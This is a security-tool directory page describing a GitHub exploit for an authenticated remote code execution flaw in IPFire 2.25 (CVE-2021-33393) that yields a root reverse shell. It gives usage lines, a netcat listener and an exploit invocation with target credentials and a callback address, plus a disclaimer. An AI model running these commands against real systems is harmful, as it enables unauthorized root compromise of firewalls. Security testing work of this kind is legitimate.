Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
IPFire_2.25_RCE_Authenticated — This exploit is based on CVE-2021-33393 and was built upon the original exploit by Mücahit Saratar, extending it to achieve a reverse shell with root privileges. | Kitploit
Tools/GitHubGitHub/joaoaugustom/ipfire_2.25_rce_authenticated
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubjoaoaugustom/ipfire_2.25_rce_authenticated

IPFire_2.25_RCE_Authenticated

This exploit is based on CVE-2021-33393 and was built upon the original exploit by Mücahit Saratar, extending it to achieve a reverse shell with root privileges.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
13 months agoNot yet reviewed

IPFire 2.25 Remote Code Execution (Authenticated) - CVE-2021-33393

This exploit is based on CVE-2021-33393 (https://nvd.nist.gov/vuln/detail/CVE-2021-33393) and was built upon the original exploit by Mücahit Saratar (https://github.com/KaanaryOverFlow/ipfire-2-25-auth-rce), extending it to achieve a reverse shell with root privileges.

Usage

Start a listener: nc -lvnp 4444

Run the exploit: python exploit.py https://192.168.0.10:444 admin 'admin@123' 192.168.0.11:4444

Disclaimer

This exploit is for educational purposes and authorized penetration testing only. Do not use against systems you do not have explicit permission to test. The author is not responsible for misuse.

Download Tool